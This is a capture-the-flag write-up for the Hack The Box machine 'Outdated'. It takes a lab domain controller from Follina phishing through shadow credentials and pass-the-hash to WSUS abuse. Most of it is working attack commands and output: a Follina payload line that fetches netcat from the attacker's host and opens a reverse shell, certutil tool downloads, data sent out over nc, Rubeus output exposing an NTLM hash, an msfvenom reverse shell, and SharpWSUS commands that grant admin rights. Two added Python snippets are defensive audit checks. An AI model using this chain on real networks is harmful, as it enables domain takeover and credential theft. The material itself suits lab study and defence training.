HTB - Outdated [Medium]
Scanning
> TARGET=10.129.106.70 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-08-15 04:40:23Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-15T04:42:09+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
|_ssl-date: 2022-08-15T04:42:08+00:00; +6h59m56s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp open unknown syn-ack ttl 127
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49884/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49903/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49924/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
- Found some hostnames in the LDAP certificate and SMTP banner; add them to /etc/hosts
10.129.106.70 outdated.htb mail.outdated.htb
Enum
- SMB
> enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
> smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
# RPC
> rpcdump.py -target-ip 10.129.106.70 outdated.htb > rpcdump.txt
# kerbrute
> kerbrute userenum -d outdated.htb --dc 10.129.106.70 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
2022/08/14 18:47:52 > [+] VALID USERNAME: guest@outdated.htb
2022/08/14 18:49:16 > [+] VALID USERNAME: administrator@outdated.htb
> kerbrute bruteuser -d outdated.htb /usr/share/wordlists/rockyou.txt guest
shares
> smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
- Read the PDF: itsupport@outdated.htb is a valid address and that mailbox opens links it receives.
- The PDF also lists unpatched vulnerabilities; CVE-2022-30190 is exploitable.
- https://github.com/JohnHammond/msdt-follina
# Change line 110
command = f"""Invoke-WebRequest http://<ip>/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe <ip> {args.reverse}"""
- Send email
swaks --to itsupport@outdated.htb --from meow@meow --server mail.outdated.htb --body "http://
/"
user: sflowers
> C:\Users\btables\Desktop>net users /domain
net users /domain
The request will be processed at a domain controller for domain outdated.htb.
User accounts for \\DC.outdated.htb
-------------------------------------------------------------------------------
Administrator btables Guest
krbtgt sflowers
The command completed successfully.
- Upload winpeas, found wsus running
> certutil.exe -urlcache -f http://<ip>:8888/p.exe p.exe
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
bloodhound
- run sharphound on the target
> certutil.exe -urlcache -f http://<ip>:8888/SharpHound.exe SharpHound.exe
> SharpHound.exe -c All --zipfilename output.zip
> nc.exe <ip> 5555 < output.zip
- Analysing the output shows that btables belongs to the group IT Staff, and IT Staff has the AddKeyCredentialLink privilege over the user sflowers, who has PSRemote access to the DC.
Shadow credential attack
- Follow this guide https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
- Upload binaries for the attack
- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
> certutil.exe -urlcache -f http://<ip>:8888/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://<ip>:8888/Rubeus.exe Rubeus.exe
> Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password EeiO2gCCHgK5oiE4
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID a9b5f7d0-02aa-4059-9a13-8b1adc5555ff
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<base64-cert>
ServiceName : krbtgt/outdated.htb
ServiceRealm : OUTDATED.HTB
UserName : sflowers
UserRealm : OUTDATED.HTB
StartTime : 8/15/2022 8:14:44 AM
EndTime : 8/15/2022 6:14:44 PM
RenewTill : 8/22/2022 8:14:44 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : SttuGPI9lPahkYurkK8WUA==
ASREP (key) : C05C572660D227E2469ED5A20B141693
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
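As an added example that is not part of the original writeup: a parser for the msDS-KeyCredentialLink attribute that Whisker modified above, so a defender can audit which accounts carry key credentials, where each key was registered and when. The blob layout follows MS-ADTS 2.2.20; the sample value is constructed here and reuses only the DeviceID and DN printed in the Whisker output.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Entry identifiers of the KEYCREDENTIALLINK_ENTRY structure (MS-ADTS 2.2.20)
KEY_ID, KEY_USAGE, KEY_SOURCE, DEVICE_ID, CREATION_TIME = 1, 4, 5, 6, 9
KEY_SOURCE_NAMES = {0: "AD", 1: "AzureAD"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME counts 100 ns ticks from here

def parse_key_credential_link(value: str) -> dict:
    """Parse one msDS-KeyCredentialLink value in DN-Binary form: B:<hexlen>:<hex>:<DN>."""
    marker, hexlen, hexdata, dn = value.split(":", 3)
    if marker != "B" or int(hexlen) != len(hexdata):
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(hexdata)
    if struct.unpack_from("<I", blob, 0)[0] != 0x200:
        raise ValueError("unexpected KeyCredentialLink version")
    entries, off = {}, 4
    while off < len(blob):  # each entry is length(2) | identifier(1) | value(length)
        length, ident = struct.unpack_from("<HB", blob, off)
        entries[ident] = blob[off + 3:off + 3 + length]
        off += 3 + length
    created = None
    if CREATION_TIME in entries:
        created = FILETIME_EPOCH + timedelta(microseconds=struct.unpack("<Q", entries[CREATION_TIME])[0] // 10)
    return {
        "dn": dn,
        "key_id": entries.get(KEY_ID, b"").hex(),
        "key_source": KEY_SOURCE_NAMES.get(entries.get(KEY_SOURCE, b"\xff")[0], "unknown"),
        "device_id": str(uuid.UUID(bytes_le=entries[DEVICE_ID])) if DEVICE_ID in entries else None,
        "created": created,
    }

def build_sample_value(device_id: str, created: datetime, dn: str) -> str:
    """Build a minimal blob so the parser can run offline (constructed sample, not a real AD value)."""
    delta = created - FILETIME_EPOCH
    ft = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    entry = lambda ident, data: struct.pack("<HB", len(data), ident) + data
    blob = struct.pack("<I", 0x200)
    blob += entry(KEY_ID, bytes(32))                   # placeholder SHA-256 key id
    blob += entry(KEY_USAGE, b"\x01")                  # 0x01 = NGC key
    blob += entry(KEY_SOURCE, b"\x00")                 # 0x00 = key registered in AD
    blob += entry(DEVICE_ID, uuid.UUID(device_id).bytes_le)
    blob += entry(CREATION_TIME, struct.pack("<Q", ft))
    return f"B:{len(blob) * 2}:{blob.hex()}:{dn}"

# Constructed sample reusing the DeviceID Whisker printed above
SAMPLE = build_sample_value("a9b5f7d0-02aa-4059-9a13-8b1adc5555ff", datetime(2022, 8, 15, 8, 14, 44, tzinfo=timezone.utc),
                            "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb")
```

Run this over the msDS-KeyCredentialLink values of user objects pulled from LDAP: an entry on an account with no Windows Hello for Business enrolment, with key source AD and a recent creation time, matches what Whisker wrote above. With Directory Service Changes auditing enabled, the write itself is logged on the DC as event 5136 against that attribute.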
foothold: sflowers
- Now, login as the user sflowers and get the flag
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
pe: admin
- Re-run SharpHound; sflowers is already on the shortest path to Domain Admin, so no more hops are needed
> SharpHound.exe -c All --zipfilename output.zip
> download C:\Users\sflowers\desktop\20220815091017_output.zip /root/workspace/Outdated/output.zip
- Check that Windows Update is pointed at a non-HTTPS WSUS server and that the policy is enforced
> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://wsus.outdated.htb:8530
> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
UseWUServer REG_DWORD 0x1
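As an added example, not part of the original writeup: a small check that parses the two reg query results above and flags the combination that makes this machine's update channel trustable by anyone on the network path. The input is constructed here to mirror the output shown.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in the shape `reg query` printed above
SAMPLE_REG_OUTPUT = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate
    WUServer    REG_SZ    http://wsus.outdated.htb:8530

HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU
    UseWUServer    REG_DWORD    0x1
"""

VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*?)\s*$")

def parse_reg_values(text: str) -> dict:
    """Collect name -> value from reg query output; REG_DWORD hex strings become ints."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)          # key-path lines have no REG_ type and are skipped
        if m:
            name, kind, raw = m.groups()
            values[name] = int(raw, 16) if kind == "REG_DWORD" else raw
    return values

def assess_wsus(values: dict) -> dict:
    """Flag the weak setting: clients forced (UseWUServer=1) onto a WSUS URL served over plain HTTP."""
    server = values.get("WUServer")
    enforced = values.get("UseWUServer") == 1
    scheme = urlsplit(server).scheme.lower() if server else None
    finding = {"server": server, "enforced": enforced, "scheme": scheme, "risk": "none"}
    if enforced and scheme == "http":
        finding["risk"] = "high"
        finding["note"] = ("Update metadata and binaries are fetched over cleartext HTTP; "
                           "move WUServer to an https:// URL with a certificate the clients trust.")
    elif enforced and scheme == "https":
        finding["risk"] = "low"
    return finding
```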
wsus attack
- I'm not a big fan of PowerShell, so I generated a reverse shell for easier operation (evil-winrm is also slower)
> msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 -f exe > payload.exe
SharpWSUS
- To exploit the vulnerability, use a tool called SharpWSUS, which creates an update and approves it for deployment to a machine, i.e. dc.outdated.htb
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#wsus-deployment
> SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators sflowers /add\"" /title:"meowmeow"
> SharpWSUS.exe approve /updateid:0be19bc9-b3db-4186-915d-622e9789b272 /computername:dc.outdated.htb /groupname:"meowgroup"
> SharpWSUS.exe check /updateid:0be19bc9-b3db-4186-915d-622e9789b272 /computername:dc.outdated.htb